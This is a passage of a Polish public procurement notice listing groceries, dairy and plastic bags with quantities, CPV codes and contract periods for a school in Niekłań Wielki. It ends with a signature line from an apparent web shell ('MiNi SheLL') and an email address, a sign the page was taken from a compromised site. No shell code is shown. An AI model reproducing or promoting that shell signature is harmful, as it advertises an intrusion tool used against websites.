butelka 1 litr litr 90, OREGANO SUSZONE, opakowanie 8g szt. 14, PAPRYKA MIELONA SŁODKA, opakowanie 20g szt. 14 PIEPRZ CZARNY MIELONY, opakowanie 20g szt. 240, PRZYPRAWA DO MIĘS, opakowanie torebka  20g szt 10, PRZYPRAWA DO  SOSÓW, opakowanie torebka  20g szt. 10, PRZYPRAWA DO RYB, opakowanie 20g szt. 10, PRZYPRAWA TYPU VEGETA, opakowanie  200g, zawierająca min. 15% suszonych warzyw takich jak marchew, cebula, ziemniaki, pasternak, seler, natka pietruszki szt. 130, PRZYPRAWA DO ZUP TYPU MAGGI opakowanie butelka 210g  szt 5, ROSOŁKI DROBIOWE TYPU WINIARY, opakowanie 120 g szt 150, RYŻ BIAŁY DŁUGOZIARNISTY SYPKI, opakowanie torba papierowa 1000g kg 50, SOK TYPU KUBUŚ, różne smaki, opakowani butelka 400 ml szt. 300, SOS PIECZENIOWY TYPU KNORR, opakowanie 1000g szt. 3, SOS DO SPAGHETTI BOLOGNESE TYPU KNORR,  w proszku, opakowanie 1 000g szt.6, 
SÓL JODOWANA opakowanie 1000g kg 110, ZIELE ANGIELSKIE, opakowanie torebka 8g szt 100, JOGURT, różne smaki, opakowanie kubek 150 g szt 1500, ŚMIETANA TYPU KONECKA 24%, opakowanie kubek 250 g szt 1100, MASŁO EXTRA, opakowanie 200g szt. 20, SER ŻÓŁTY GOUDA, pakowany w plastrach na tackach 250g szt 60, TWARÓG W KOSTCE, opakowanie 250g szt 50..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Sukcesywna   dostawa i zakup   artykułów żywnościowych dla Zespołu Szkól Publicznych   w Niekłaniu Wielkim . Część III
Część F Woreczki i torebki foliowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamowienia w części F jest dostawa i zakup WORECZKI ŚNIADANIOWE, opakowanie 1000 sztuk opakowań 2 ZRYWKI FOLIOWE, opakowanie 100 sztuk opakowań 5..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com